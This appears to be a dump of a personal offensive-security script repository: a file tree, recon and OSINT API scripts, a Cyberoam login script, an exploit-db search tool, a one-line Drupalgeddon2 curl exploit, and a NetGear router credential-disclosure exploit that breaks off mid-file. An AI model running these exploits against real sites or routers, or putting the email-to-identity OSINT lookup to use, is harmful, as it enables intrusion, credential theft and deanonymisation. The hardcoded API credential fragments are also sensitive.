├── Blacklist_IP_Check ├── Blacklist_IP_Check.py └── Readme.md ├── Censys_API ├── README.md └── censys.py ├── CloudBleed_Chrome_POC ├── README.md └── check.py ├── Cyberoam Login Automation Scripts ├── DNS_Dumpster ├── DNSDumpsterAPI.pyc └── dnsdumpster.py ├── Drupalgeddon2_CURL ├── Exploit-DB Search ├── README.md └── exploit-db-search ├── Facebook_OSINT ├── FacebookResetPasswordAPI.pyc ├── README.md └── facebook.py ├── HackerTarget_IP_Info_API ├── HackerTarget_API_TargetInfo.py └── readme.md ├── NetGear_Exploits ├── passwordrecovered_cgi_exploit.py └── passwrd_cgi_exploit.py ├── Offensive_Security_Red_Team_Library.md ├── Open_Phish ├── db_create.py ├── feed.txt ├── feed_1.txt ├── new.db ├── openphish_old.db └── openphish_websites_database.py ├── Penentration Testing_Scripts ├── Cheatsheets │ ├── Cheatsheet_AIXBuild.txt │ ├── Cheatsheet_AVBypass.txt │ ├── Cheatsheet_ApacheSSL.txt │ ├── Cheatsheet_AttackingMSSQL.txt │ ├── Cheatsheet_BashScripting.txt │ ├── Cheatsheet_BuildReviews.txt │ ├── Cheatsheet_CTF.txt │ ├── Cheatsheet_CiscoIOS.txt │ ├── Cheatsheet_CookieStealing.txt │ ├── Cheatsheet_DomainAdminExploitation.txt │ ├── Cheatsheet_ExploitDev.txt │ ├── Cheatsheet_GDB.txt │ ├── Cheatsheet_GPG.txt │ ├── Cheatsheet_HTTPBasicAuth.txt │ ├── Cheatsheet_IKEScan.txt │ ├── Cheatsheet_LinuxPrivilegeEsc.txt │ ├── Cheatsheet_LocalSamDump.txt │ ├── Cheatsheet_MSFPostExploitation.txt │ ├── Cheatsheet_Metasploit.pdf │ ├── Cheatsheet_MetasploitPayloads.txt │ ├── Cheatsheet_MobileAppTesting.txt │ ├── Cheatsheet_Networking.txt │ ├── Cheatsheet_OWASPCheckList.txt │ ├── Cheatsheet_Oracle.txt │ ├── Cheatsheet_PenTesting.txt │ ├── Cheatsheet_Pyinstaller.txt │ ├── Cheatsheet_Python.pdf │ ├── Cheatsheet_Remediations.txt │ ├── Cheatsheet_SMBCapture.txt │ ├── Cheatsheet_SMBEnumeration.txt │ ├── Cheatsheet_SMTPOpenRelay.txt │ ├── Cheatsheet_SQLInjection.txt │ ├── Cheatsheet_SSLStrip.txt │ ├── Cheatsheet_Solaris.txt │ ├── Cheatsheet_Tools.txt │ ├── Cheatsheet_UsefulCommands.txt │ ├── Cheatsheet_VOIP.txt │ ├── Cheatsheet_Vlans.txt │ ├── Cheatsheet_VulnVerify.txt │ ├── Cheatsheet_WindowsCommandLine.pdf │ ├── Cheatsheet_WirelessTesting.txt │ ├── Cheatsheet_XSS.txt │ ├── Cheatsheet_scp.txt │ └── README.md ├── Pentest_Tools │ ├── DNS_lookup.sh │ ├── README.md │ ├── SMTP_VRFY.sh │ ├── dns_zone_transfer.sh │ ├── forward_DNS.sh │ ├── list.txt │ ├── nmap_spam.sh │ ├── ping_sweep.sh │ ├── reverse_DNS.sh │ └── vrfy.py └── ftp_brute_force │ ├── ftp_brute_force.py │ ├── passwords.txt │ ├── requirements.txt │ └── users.txt ├── Python_3_Tutorials ├── 02 Quick Start │ ├── conditionals.py │ ├── exceptions.py │ ├── forloop.py │ ├── function.py │ ├── generator.py │ ├── hello.py │ ├── lines.txt │ ├── oop2.py │ ├── oop3.py │ ├── simpleoop.py │ └── whileloop.py ├── 04 Syntax │ ├── comments.py │ └── syntax.py ├── 05 Variables │ └── variables.py ├── 06 Conditionals │ ├── conditionals.py │ ├── jumptable.py │ └── switch.py ├── 07 Loops │ ├── for.py │ ├── iterators.py │ ├── lines.txt │ ├── loopcontrol.py │ └── while.py ├── 08 Operators │ └── ops.py ├── 09 Regexes │ ├── raven.txt │ └── regex.py ├── 10 Exceptions │ ├── exceptions.py │ └── lines.txt ├── 11 Functions │ ├── functions.py │ └── generator.py ├── 12 Classes │ ├── classes.py │ ├── decorators.py │ └── generator.py ├── 13 Strings │ ├── lines.txt │ └── strings.py ├── 14 Containers │ ├── containers.py │ └── utf8.txt ├── 15 Files │ ├── bigfile.txt │ ├── files.py │ ├── lines.txt │ └── olives.jpg ├── 16 Databases │ ├── databases.py │ ├── sqlite3-class.py │ └── sqlite3-crud.py ├── 17 Modules │ ├── modules.py │ ├── saytime.py │ ├── saytime.pyc │ └── web-saytime.py ├── 18 Debugging │ ├── incrange-errors.py │ ├── mvc-errors.py │ ├── saytime-errors.py │ ├── saytime.py │ └── test-saytime.py └── 19 Projects │ └── Extras │ └── RSS │ ├── rss.db │ ├── rss.py │ ├── rss.py~ │ ├── rssdb.py │ ├── rssdb.py~ │ ├── tkrss.py │ └── tkrss.py~ ├── README.md ├── SSH-Audit ├── LICENSE ├── README.md ├── ssh-audit.py └── test │ ├── conftest.py │ ├── coverage.sh │ ├── mypy-py2.sh │ ├── mypy-py3.sh │ ├── mypy.ini │ ├── prospector.sh │ ├── prospector.yml │ ├── test_auditconf.py │ ├── test_banner.py │ ├── test_buffer.py │ ├── test_errors.py │ ├── test_output.py │ ├── test_software.py │ ├── test_ssh1.py │ ├── test_ssh2.py │ └── test_version_compare.py ├── Threat_Blacklisted_Collection ├── README.md ├── ThreatCollection_Blacklisted_BigData.py └── ThreatCollection_Blacklisted_Small.py ├── Threatfeeds-Automation └── RansomePaymentGatewayfeeds │ ├── Readme.md │ └── ransomepaymentfeeds.py ├── VirusTotal_Automation ├── Virustotal.py └── readme.md ├── Wordpress_Bruteforce_Scripts ├── WordpressLoginBruteforcer │ ├── h.py │ └── script.py └── WordpressPasswordBruteforcer │ ├── dic.txt │ └── script.py ├── email_hacked.py ├── escape_shell.py ├── haveibeenpwned.py ├── keylogger.py ├── linkden-company_employee-enumeration ├── README.md └── linkden_company_employee_enumeration.py ├── md5_crack_challenge ├── fuck.py ├── h.py ├── hash.txt ├── hashes.txt └── wordlist.txt ├── nmapslackscan.sh ├── salaries-flask-app ├── app.py └── salaries.db ├── shodan_ip_download.py ├── sslcert_verification.py └── trainings ├── Browser_auto-fill_security ├── autofill-demo.gif ├── index.html └── readme.md ├── Hellman.txt ├── Log Analysis ├── Apache_Log_Analyzer.zip ├── Apache_Log_Analyzer │ ├── Apache_Final.py │ ├── access_log_new │ ├── access_log_old │ └── log_report.html ├── Bose │ ├── Linux for Infosec People.txt │ ├── apache_log_analysis.txt │ ├── log_analysis_Intro.txt │ └── log_analysis_Intro1.txt ├── Python_Basics.txt ├── Trainings_LogAnalysis_Linuxforinfosec.tar ├── access_log ├── access_log_scan_report_from_Thu_04_Aug_2016_22_01_43 ├── apache_log_analysis.txt ├── awk.txt ├── cisco.log ├── cisco_loganalysis.txt ├── index.html ├── log_analysis_Intro.txt ├── log_analysis_Intro1.txt ├── new_log_analysis.txt ├── scan_log.py ├── sed.log └── soc.txt └── crypto ├── assmetrickey ├── file-enc-pubkey.txt ├── files.tar.gz ├── hell.txt ├── hell1.txt ├── hell2.txt ├── hell22.txt └── hell3.txt ├── encryption_demo.txt ├── gpgdemo ├── hell.txt.gpg └── out.txt ├── hash.py ├── hashdemo └── hell.txt ├── openssl ├── aes │ ├── a.enc │ ├── a.txt │ ├── intro.txt │ ├── intro.txt~ │ └── output.txt ├── ca │ ├── intro.txt │ └── intro.txt~ ├── decrypt.txt ├── encrypt.dat ├── encrypt.txt ├── privatekey.pem └── pubkey.pem └── topics ├── aes ├── intro.txt ├── secrets.txt ├── secrets.txt.new └── serects.txt.enc ├── crypto_basic.txt ├── des └── a.txt ├── rc4 ├── a.py └── rc4.py └── xor.py /Blacklist_IP_Check/Readme.md: -------------------------------------------------------------------------------- 1 | ### IP Blacklist IP check ? 2 | 3 | This python script that will check an IP against popular IP and DNS blacklists. 4 | 5 | # Usage 6 | python Blacklist_IP_Check.py 7 | 8 | #Important Notice 9 | *This will likely break your system.* 10 | -------------------------------------------------------------------------------- /Censys_API/README.md: -------------------------------------------------------------------------------- 1 | # censys 2 | A Simple Censys.io Python API Search 3 | 4 | #Running 5 | 6 | Searching Domain Name: 7 | python censys.py -f www.censys.io 8 | 9 | Searching Generic Terms: 10 | python censys.py -f censys 11 | 12 | Searching IP Space: 13 | python censys.py -f 216.239.32.0/24 14 | 15 | #Important Notice 16 | 17 | I am not a programmer. 18 | -------------------------------------------------------------------------------- /Censys_API/censys.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # Name: censys.py 4 | # Purpose: Censys API Script 5 | 6 | from termcolor import colored 7 | import argparse 8 | import json 9 | import requests 10 | import codecs 11 | import locale 12 | import os 13 | import sys 14 | import ast 15 | 16 | 17 | class Censys: 18 | 19 | def __init__(self, ip): 20 | 21 | self.API_URL = "https://www.censys.io/api/v1" 22 | self.UID = "1dca12ac-261b-"#"Get From Censys.IO" 23 | self.SECRET ="JEunZiMsvqH" #"Get From Censys.IO" 24 | self.ip = ip 25 | 26 | def search(self): 27 | 28 | pages = float('inf') 29 | page = 1 30 | 31 | while page <= pages: 32 | 33 | params = {'query' : self.ip, 'page' : page} 34 | res = requests.post(self.API_URL + "/search/ipv4", json = params, auth = (self.UID, self.SECRET)) 35 | payload = res.json() 36 | 37 | 38 | for r in payload['results']: 39 | 40 | ip = r["ip"] 41 | proto = r["protocols"] 42 | proto = [p.split("/")[0] for p in proto] 43 | proto.sort(key=float) 44 | protoList = ','.join(map(str, proto)) 45 | 46 | 47 | print '[%s] IP: %s - Protocols: %s' % (colored('*', 'red'), ip, protoList) 48 | 49 | 50 | if '80' in protoList: 51 | self.view(ip) 52 | 53 | pages = payload['metadata']['pages'] 54 | page += 1 55 | 56 | def view(self, server): 57 | 58 | res = requests.get(self.API_URL + ("/view/ipv4/%s" % server), auth = (self.UID, self.SECRET)) 59 | payload = res.json() 60 | 61 | try: 62 | if 'title' in payload['80']['http']['get'].keys(): 63 | print "[+] Title: %s" % payload['80']['http']['get']['title'] 64 | if 'server' in payload['80']['http']['get']['headers'].keys(): 65 | print "[+] Server: %s" % payload['80']['http']['get']['headers']['server'] 66 | except Exception as error: 67 | print error 68 | 69 | parser = argparse.ArgumentParser(description = 'CENSYS.IO Web Server Search') 70 | parser.add_argument('-f', '--find', help='CENSYS Search', required = True) 71 | 72 | 73 | args = parser.parse_args() 74 | ip = args.find 75 | 76 | censys = Censys(ip) 77 | censys.search() 78 | -------------------------------------------------------------------------------- /CloudBleed_Chrome_POC/README.md: -------------------------------------------------------------------------------- 1 | This project is in response to the silly-named, but scary CloudFront CDN issue currently unfolding. While it is very possible that your data is secure if you use a site on this list: https://github.com/pirate/sites-using-cloudflare a good chunk were verified to have had sensitive data exposed - including passwords, logins, personal information, etc. 2 | 3 | As always when something like this comes about, change your passwords. This one is difficult because CloudFront is a massive player in this space so many, many sites were affected. Just because a site is on the list does not mean the sensitive parts of the site were, just because the sensitive parts were does not mean that *your* data was, etc. Still, this involves data that may still be cached/present, and it's worth the time to change your passwords if this affects you. 4 | 5 | This is a good time to put in a big plug for a good password management system. Lastpass and 1password have excellent apps as do many others. 6 | 7 | To do see what I needed to change I exported my Chrome password file, then wrote this script to dump out anything I had affected. 8 | 9 | To export Chrome passwords: 10 | 11 | 1. Open Chrome://flags in your Chrome. 12 | 2. Find Password Import and Export option, select Enabled from the drop-down box, and then restart the Chrome browser. 13 | 3. Now, open Chrome://settings/passwords page. 14 | 4. Click on Export button to export/backup saved passwords.' 15 | 16 | Steps from: www.intowindows.com/how-to-backup-saved-passwords-in-google-chrome-browser/ 17 | 18 | Requirements: 19 | 20 | 1. OSX, or Linux environments. 21 | 2. Python 2.7 or later. 22 | 3. Existing /tmp/password.csv from the above steps. 23 | 4. check.py from this project existing in /tmp/check.py 24 | 25 | Download checker.py from here, and run it. It will download, unzip, and compare only the website name (with a little formatting) against the affected list. This password file should be *deleted* as soon as you are done (the script will not do this for you), and if in doubt - change any credentials that may have been revealed. Don't trust that the master list is valid, or that my novice attempts to deal with this didn't miss something important. 26 | -------------------------------------------------------------------------------- /CloudBleed_Chrome_POC/check.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | #Team: r3b00t 3 | #Author: P3t3rp4rk3r 4 | import os 5 | from io import BytesIO 6 | from urllib2 import urlopen 7 | from zipfile import ZipFile 8 | 9 | pass_file='/tmp/password.csv' 10 | sites='/tmp/list.csv' 11 | vulnsites='https://github.com/pirate/sites-using-cloudflare/archive/master.zip' 12 | pw_list = [] 13 | sites = [] 14 | 15 | if not os.path.isfile(sites): 16 | urlobj = urlopen(vulnsites) 17 | with ZipFile(BytesIO(urlobj.read())) as zf: 18 | zf.extract('sites-using-cloudflare-master/sorted_unique_cf.txt', '/tmp/') 19 | os.rename('/tmp/sites-using-cloudflare-master/sorted_unique_cf.txt', '/tmp/list.csv') 20 | 21 | with open(sites, 'r') as f: 22 | for line in f.readlines(): 23 | sites.append(line.rstrip()) 24 | f.close() 25 | 26 | with open(pass_file, 'r') as f: 27 | for line in f.readlines(): 28 | newline=line.split(',')[0].replace('http://','').replace('www.', '').lower().rstrip() 29 | pw_list.append(newline) 30 | f.close() 31 | 32 | result=sorted(list(set(pw_list) & set(sites))) 33 | print(result) 34 | 35 | -------------------------------------------------------------------------------- /Cyberoam Login Automation Scripts: -------------------------------------------------------------------------------- 1 | # Cyberoam Web Access URL 2 | link="http://192.168.1.1:8090/login.xml" 3 | 4 | ######################## 5 | # Constant Hidden Form Fields 6 | isAccessDenied="" 7 | url="" 8 | message="" 9 | saveinfo="saveinfo" 10 | timestamp="$(date +%s)" 11 | ######################## 12 | # Variable Hidden Form Fields 13 | mode="193" 14 | btnSubmit="Logout" 15 | 16 | ####################### 17 | # Login session check and using CLI cURL to send post data to logout Cyberoam 18 | if ls ~/.cyberoam-login.tmp &> /dev/null 19 | then 20 | source ~/.cyberoam-login.tmp 21 | 22 | zenity --question --title="Cyberoam Login" \ 23 | --text="You are logged in Cyberoam. \n\n\n Status \t\t Logged In \n Username \t $username" \ 24 | --ok-label "Logout" --cancel-label="Close" \ 25 | --width=300 --height=150 \ 26 | ; opt=`echo $?` 27 | 28 | if [ $opt -eq 1 ] 29 | then 30 | exit 31 | else 32 | curl $link --data username="$username" --data password="$password" --data a="$timestamp" --data mode="$mode" --data producttype="0" --data btnSubmit="$btnSubmit" --data isAccessDenied="$isAccessDenied" --data url="$url" --data message="$message" --data saveinfo="$saveinfo" -k &> ~/.cyberoam-log.tmp 33 | 34 | if grep "logoutstatus=true" ~/.cyberoam-log.tmp > /dev/null 35 | then 36 | rm -f ~/.cyberoam-log.tmp ~/.cyberoam-login.tmp 37 | exit 38 | fi 39 | fi 40 | fi 41 | 42 | ######################## 43 | # Variable Hidden Form Fields 44 | mode="191" 45 | btnSubmit="Login" 46 | 47 | ######################## 48 | # Login Variables Input 49 | if [ $# -eq 2 ] 50 | then 51 | username="$1" 52 | password="$2" 53 | else 54 | username=`zenity --entry --title="Cyberoam Login" --width=300 --height=150 \ 55 | --text="Enter Username"` 56 | 57 | if [ -z $username ] 58 | then 59 | exit 60 | fi 61 | 62 | password=`zenity --entry --title="Cyberoam Login" --width=300 --height=150 \ 63 | --text="Enter Password" --hide-text` 64 | 65 | if [ -z $password ] 66 | then 67 | exit 68 | fi 69 | fi 70 | 71 | ####################### 72 | # Using CLI cURL to send post data to login Cyberoam 73 | curl $link --data username="$username" --data password="$password" --data a="$timestamp" --data producttype="0" \ 74 | --data mode="$mode" --data btnSubmit="$btnSubmit" \ 75 | --data isAccessDenied="$isAccessDenied" --data url="$url" --data message="$message" --data saveinfo="$saveinfo" \ 76 | -k &> ~/.cyberoam-log.tmp 77 | 78 | cnt=0 79 | 80 | while grep "loginstatus=false" ~/.cyberoam-log.tmp > /dev/null 81 | do 82 | curl $link --data username="$username" --data password="$password" --data a="$timestamp" --data producttype="0" \ 83 | --data mode="$mode" --data btnSubmit="$btnSubmit" \ 84 | --data isAccessDenied="$isAccessDenied" --data url="$url" --data message="$message" --data saveinfo="$saveinfo" \ 85 | -k &> ~/.cyberoam-log.tmp 86 | 87 | cnt=`expr $cnt + 1` 88 | 89 | if [ $cnt -ge 5 ] 90 | then 91 | break 92 | fi 93 | done 94 | 95 | if grep "loginstatus=true" ~/.cyberoam-log.tmp > /dev/null 96 | then 97 | echo "username=$username" >> ~/.cyberoam-login.tmp 98 | 99 | zenity --info --title="Cyberoam Login" \ 100 | --text="You are logged in Cyberoam. \n\n\n Status \t\t Logged In \n Username \t $username" \ 101 | --width=300 --height=150 102 | else 103 | var=`grep "loginstatus" ~/.cyberoam-log.tmp | awk '{ print $2 }'` 104 | len2=`echo ${var:88} | wc -c` 105 | 106 | len_msg=`expr $len2 - 62` 107 | 108 | msg=`echo ${var:89:$len_msg}` 109 | err=`echo $msg | sed 's/+/ /g' | sed 's/%2C/,/g'` 110 | 111 | zenity --info --title="Cyberoam Login" \ 112 | --text="$err" \ 113 | --width=300 --height=150 114 | fi 115 | -------------------------------------------------------------------------------- /DNS_Dumpster/DNSDumpsterAPI.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/DNS_Dumpster/DNSDumpsterAPI.pyc -------------------------------------------------------------------------------- /DNS_Dumpster/dnsdumpster.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Independent Security Research" 3 | 4 | from DNSDumpsterAPI import DNSDumpsterAPI 5 | 6 | a = raw_input("Enter the target:") 7 | res = DNSDumpsterAPI(False).search(a) 8 | #print res 9 | print "[+] Domain " 10 | print res['domain'] 11 | 12 | print "[+] DNS Servers" 13 | for entry in res['dns_records']['dns']: 14 | print("{domain} {ip} {as} {provider} {country} {header}".format(**entry)) 15 | 16 | print "{+} MX Records" 17 | for entry in res['dns_records']['mx']: 18 | print("{domain} ({ip}) {as} {provider} {country} {header}".format(**entry)) 19 | 20 | print "[+] Host Records" 21 | 22 | for entry in res['dns_records']['host']: 23 | if entry['reverse_dns']: 24 | print("{domain} ({reverse_dns}) ({ip}) {as} {provider} {country} {header}".format(**entry)) 25 | else: 26 | print("{domain} ({ip}) {as} {provider} {country} {header}".format(**entry)) 27 | 28 | print "[+] TXT Records" 29 | 30 | for entry in res['dns_records']['txt']: 31 | print entry 32 | 33 | print "[+] Image Save" 34 | image_retrieved = res['image_data'] is not None 35 | print "\n\n\nRetrieved Network mapping image? {} (accessible in 'image_data')".format(image_retrieved) 36 | #print repr(res['image_data'].decode('base64')[:20]) + '...' 37 | print "Created"+a+".png" 38 | open(a+'.png','wb').write(res['image_data'].decode('base64')) 39 | print "[+] Image Saved Successfully ..!!!" 40 | 41 | 42 | print "[+] XLSX File" 43 | 44 | xls_retrieved = res['xls_data'] is not None 45 | print "\n\n\nRetrieved XLS hosts? {} (accessible in 'xls_data')".format(xls_retrieved) 46 | #print repr(res['xls_data'].decode('base64')[:20]) + '...' # to save it somewhere else. 47 | print "Created"+a+".xlsx" 48 | open(a+'.xlsx','wb').write(res['xls_data'].decode('base64')) 49 | print "[+] XLSX Saved Successfully ..!!!" 50 | -------------------------------------------------------------------------------- /Drupalgeddon2_CURL: -------------------------------------------------------------------------------- 1 | curl -X POST --data \ 2 | 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=phpinfo()' \ 3 | 'https://localhost/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 4 | -------------------------------------------------------------------------------- /Exploit-DB Search/README.md: -------------------------------------------------------------------------------- 1 | # Exploit-DB-search 2 | 3 | ``` 4 | $ ./exploit-db-search 5 | exploit-db-search - 6 | Usage: exploit-db-search [options] [str1 [str2] ... [strN]] 7 | Example: exploit-db-search linux root 8 | exploit-db-search php sql 9 | exploit-db-search -s php Sql 10 | exploit-db-search -h 11 | Options: 12 | -s Case sensitive search 13 | -h Show help screen 14 | -u Update exploit database 15 | -q Quiet search; does not give verbose output 16 | ``` 17 | 18 | ``` 19 | ./exploit-db-search phpD windows local 20 | ------------------------------------------------------------------------------------------------------------------------------------------------ 21 | Title | Github URL | exploit-db URL 22 | ------------------------------------------------------------------------------------------------------------------------------------------------ 23 | phpDEV5 - System-Call Local Denial of Service Exploit | https://github.com/offensive-security/exploit-database/blob/master/platforms/windows/dos/888.txt | http://www.exploit-db.com/exploits/888 24 | 25 | ------------------------------------------------------------------------------------------------------------------------------------------------ 26 | 27 | -------------------------------------------------------------------------------- /Exploit-DB Search/exploit-db-search: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Search Exploit-db tool 3 | 4 | exploit_remote="https://raw.githubusercontent.com/offensive-security/exploit-database/master/files.csv" 5 | exploit_list_file="files.csv" 6 | prog=$(basename $0) 7 | default_err="Unknown error occurred" 8 | desc="An exploit database search tool" 9 | author="techgaun" 10 | version="0.1" 11 | red='\033[0;31m' 12 | green='\033[0;32m' 13 | nc='\033[0m' 14 | casesearch=false 15 | quiet=false 16 | search_strs= 17 | 18 | error() { 19 | msg="${1:-$default_err}" 20 | echo -e "${red}${msg}${nc}" 21 | exit 1 22 | } 23 | 24 | msg() { 25 | msg="${1:-nothing}" 26 | echo -e "${green}${msg}${nc}" 27 | } 28 | 29 | usage() { 30 | echo >&2 "${prog} - written by ${author} 31 | Usage: ${prog} [options] [str1 [str2] ... [strN]] 32 | Example: ${prog} linux root 33 | ${prog} php sql 34 | ${prog} -s php Sql 35 | ${prog} -h 36 | Options: 37 | -s Case sensitive search 38 | -h Show help screen 39 | -u Update exploit database 40 | -q Quiet search; does not give verbose output 41 | " 42 | exit 0 43 | } 44 | 45 | sploit_init() { 46 | if [[ ! -f "${exploit_list_file}" ]]; then 47 | msg "Updating exploit database" 48 | if ! wget "${exploit_remote}" -O "${exploit_list_file}" > /dev/null 2>&1; then 49 | rm -f "${exploit_list_file}" 50 | error "Could not download exploit database" 51 | fi 52 | msg "Updated exploit database" 53 | fi 54 | } 55 | 56 | update() { 57 | rm -f "${exploit_list_file}" && sploit_init 58 | exit 0 59 | } 60 | 61 | main() { 62 | local OPTIND 63 | if [[ "$#" -eq 0 ]]; then 64 | usage 65 | fi 66 | sploit_init 67 | ARGS="-" 68 | for param in $@; do 69 | if [[ "${param:0:1}" == "-" ]]; then 70 | ARGS=${ARGS}${param:1} 71 | shift 72 | continue 73 | fi 74 | search_strs=("/${param}/ && ${search_strs}") 75 | done 76 | 77 | while getopts ":shuq" opt ${ARGS}; do 78 | case ${opt} in 79 | h) usage;; 80 | s) casesearch=true;; 81 | u) update;; 82 | q) quiet=true;; 83 | \?) usage;; 84 | esac 85 | done 86 | 87 | shift $(( $OPTIND - 1 )) 88 | ignore_case="BEGIN {IGNORECASE = 1} " 89 | if ${casesearch}; then 90 | ignore_case= 91 | fi 92 | search_strs=$(sed 's/ &&$//' <<< ${search_strs}) 93 | result=$(awk "${ignore_case}${search_strs}" < ${exploit_list_file}) 94 | if [[ "x${result}" == "x" ]]; then 95 | error "No such exploit found" 96 | fi 97 | width=$(tput cols) 98 | reduced_width=$((width - 3)) 99 | desc_col=$((${reduced_width} / 3)) 100 | git_col=$((${reduced_width} / 3)) 101 | exploitdb_col=$((${reduced_width}/3)) 102 | 103 | printf "%0.s-" $(eval echo {1..${width}}) 104 | if ! ${quiet}; then 105 | printf "\n%-${desc_col}s|%-${git_col}s|%-${exploitdb_col}s" " Title" " Github URL " " exploit-db URL " 106 | echo 107 | printf "%0.s-" $(eval echo {1..${width}}) 108 | git_base_url="https://github.com/offensive-security/exploit-database/blob/master/" 109 | exploitdb_url="http://www.exploit-db.com/exploits/" 110 | echo 111 | while read line; do 112 | awk -F "\"*,\"*" '{ printf "%s | '${git_base_url}'%s | '${exploitdb_url}'%s\n", $3, $2, $1}' <<< "${line}" 113 | done <<< "${result}" 114 | else 115 | exploit_path=40 116 | desc_col=$((${reduced_width} - ${exploit_path})) 117 | printf "\n%0-${desc_col}s|%0-${exploit_path}s" " Title" " Path" 118 | echo 119 | printf "%0.s-" $(eval echo {1..${width}}) 120 | desc_col=$((${desc_col} - 1)) 121 | echo 122 | while read line; do 123 | awk -F "\"*,\"*" '{ printf "%-'${desc_col}'s | %s\n", $3, $2 }' <<< "${line}" 124 | done <<< "${result}" 125 | fi 126 | echo 127 | printf "%0.s-" $(eval echo {1..${width}}) 128 | } 129 | 130 | main "$@" 131 | -------------------------------------------------------------------------------- /Facebook_OSINT/FacebookResetPasswordAPI.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Facebook_OSINT/FacebookResetPasswordAPI.pyc -------------------------------------------------------------------------------- /Facebook_OSINT/README.md: -------------------------------------------------------------------------------- 1 | Facebook Reset Password API 2 | ================ 3 | 4 | Quick utility to retrieve full display name and profile picture from a simple e-mail address (if the privacy settings have not been configured properly). 5 | 6 | Usage 7 | ====== 8 | 9 | ```python 10 | #!/bin/python 11 | # coding: utf-8 12 | 13 | from FacebookResetPasswordAPI import FacebookResetPasswordAPI 14 | res = FacebookResetPasswordAPI({'verbose': True}).get('email@domail.com') 15 | print res # retrieves the results 16 | ``` 17 | 18 | And the result looks something like: 19 | 20 | ``` 21 | [verbose] Token retrieved: AVpvxQbb 22 | [verbose] jsdatr retrieved: UPrlVd-aKAWKxxxXAAPwJ7wz 23 | {'profile_picture': 'https://www.facebook.com/profile/pic.php?cuid=AYhEUfs4ayVJXXXXXXXXXXXXXXXXXXXXXXXXXXXX', 'full_name': u'Paul XXXXXXXXXX'} 24 | ``` 25 | 26 | -------------------------------------------------------------------------------- /Facebook_OSINT/facebook.py: -------------------------------------------------------------------------------- 1 | from FacebookResetPasswordAPI import FacebookResetPasswordAPI 2 | a = raw_input("email:") 3 | res = FacebookResetPasswordAPI({'verbose': True}).get(a) 4 | print res # retrieves the results 5 | -------------------------------------------------------------------------------- /HackerTarget_IP_Info_API/HackerTarget_API_TargetInfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __author__ = "Santhosh Baswa" 3 | __copyright__ = "Copyright 2016, Independent Security Researcher" 4 | 5 | import os 6 | import sys 7 | import json 8 | import urllib 9 | import urllib2 10 | import hashlib 11 | import argparse 12 | import re 13 | import socket 14 | from urllib2 import urlopen 15 | 16 | 17 | def color(text, color_code): 18 | if sys.platform == "win32" and os.getenv("TERM") != "xterm": 19 | return text 20 | 21 | return '\x1b[%dm%s\x1b[0m' % (color_code, text) 22 | 23 | 24 | def red(text): 25 | return color(text, 31) 26 | 27 | def blue(text): 28 | return color(text, 34) 29 | 30 | 31 | 32 | if __name__ == "__main__": 33 | 34 | my_ip = raw_input("Enter the IP Address:") 35 | 36 | print(blue('Get Reverse DNS, GeoIP, NMAP, Traceroute and pulls HTTP Headers for an IP address')) 37 | print(blue('A quick and dirty script by @jgamblin')) 38 | print('\n') 39 | print(red('Your Target IP address is {0}'.format(my_ip))) 40 | print('\n') 41 | 42 | #Get IP To SCAN 43 | 44 | resp = raw_input(blue('Would you like target info about {0}? (Y/N):'.format(my_ip))) 45 | 46 | if resp.lower() in ["yes", "y"]: 47 | badip = my_ip 48 | else: 49 | badip = raw_input(blue("What IP would you like to check?: ")) 50 | 51 | print('\n') 52 | 53 | #IP INFO 54 | reversed_dns = urllib.urlopen('http://api.hackertarget.com/reverseiplookup/?q=' + badip).read() 55 | geoip = urllib.urlopen('http://api.hackertarget.com/geoip/?q=' + badip).read() 56 | nmap = urllib.urlopen('http://api.hackertarget.com/nmap/?q=' + badip).read() 57 | httpheaders = urllib.urlopen('http://api.hackertarget.com/httpheaders/?q=' + badip).read() 58 | tracert = urllib.urlopen('http://api.hackertarget.com/mtr/?q=' + badip).read() 59 | 60 | print(red('Reverse DNS Information:')) 61 | print(blue(reversed_dns)) 62 | print('\n') 63 | print(red('GEOIP Information:')) 64 | print(blue(geoip)) 65 | print('\n') 66 | print(red('NMAP of Traget (Only Ports: 21,25,80 and 443):')) 67 | print(blue(nmap)) 68 | print('\n') 69 | print(red('HTTP Headers:')) 70 | print(blue(httpheaders)) 71 | print('\n') 72 | print(red('Trace Route:')) 73 | print(blue(tracert)) 74 | print('\n') 75 | -------------------------------------------------------------------------------- /HackerTarget_IP_Info_API/readme.md: -------------------------------------------------------------------------------- 1 | ### HackerTarget API Target Info 2 | 3 | HackerTarget_API_TargetInfo is a python script that will get Reverse DNS, GeoIP, NMAP, Traceroute and pulls HTTP Headers for Target IP address. 4 | 5 | 6 | # Usage 7 | 8 | python HackerTarget_API_TargetInfo.py 9 | 10 | 11 | #Important Notice 12 | *It could be illegal in your country.* 13 | -------------------------------------------------------------------------------- /NetGear_Exploits/passwordrecovered_cgi_exploit.py: -------------------------------------------------------------------------------- 1 | """This can easily be reproduced using the attached poc, or by sending these two 2 | simple requests via the browser: 3 | 1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token 4 | 2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials 5 | (some models require you to send a post request instead of get) 6 | """ 7 | 8 | import sys 9 | import requests 10 | 11 | 12 | def scrape(text, start_trig, end_trig): 13 | if text.find(start_trig) != -1: 14 | return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] 15 | else: 16 | return "i_dont_speak_english" 17 | 18 | requests.packages.urllib3.disable_warnings() 19 | 20 | ip = sys.argv[1] 21 | port = sys.argv[2] 22 | url = 'http://' + ip + ':' + port + '/' 23 | try: 24 | r = requests.get(url) 25 | except: 26 | url = 'https://' + ip + ':' + port + '/' 27 | r = requests.get(url, verify=False) 28 | model = r.headers.get('WWW-Authenticate') 29 | if model is not None: 30 | print "Attcking: " + model[13:-1] 31 | else: 32 